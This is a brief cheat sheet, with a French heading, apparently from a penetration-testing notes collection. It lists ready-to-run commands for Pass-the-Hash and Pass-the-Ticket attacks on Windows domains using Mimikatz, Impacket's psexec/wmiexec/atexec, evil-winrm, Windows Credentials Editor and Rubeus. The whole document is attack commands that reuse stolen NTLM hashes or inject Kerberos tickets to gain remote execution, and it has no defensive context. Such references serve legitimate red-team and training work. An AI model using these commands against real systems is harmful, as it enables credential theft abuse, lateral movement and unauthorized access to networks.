# Pass the Hash/Ticket

## **Pass the Hash**

### Mimikatz :

```
Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"'
```

### Impacket :

```
psexec_windows.exe -hashes ":NTHASH" user@<domain>
wmiexec_windows.exe -hashes ":NTHASH" user@<domain>
atexec_windows.exe -hashes ":NTHASH" user@<domain> 'whoami'
```

### EvilWin-RM:

```
evil-winrm -u <username> -H <Hash> -i <IP>
```

### Windows Credentials Editor :

```
wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>
```

## **Pass the Ticket**

### Récupérer les tickets en mémoire :

```
mimikatz.exe "kerberos::ptt "kirbi_ticket"
.\Rubeus.exe ptt /ticket:kirbi_ticket
```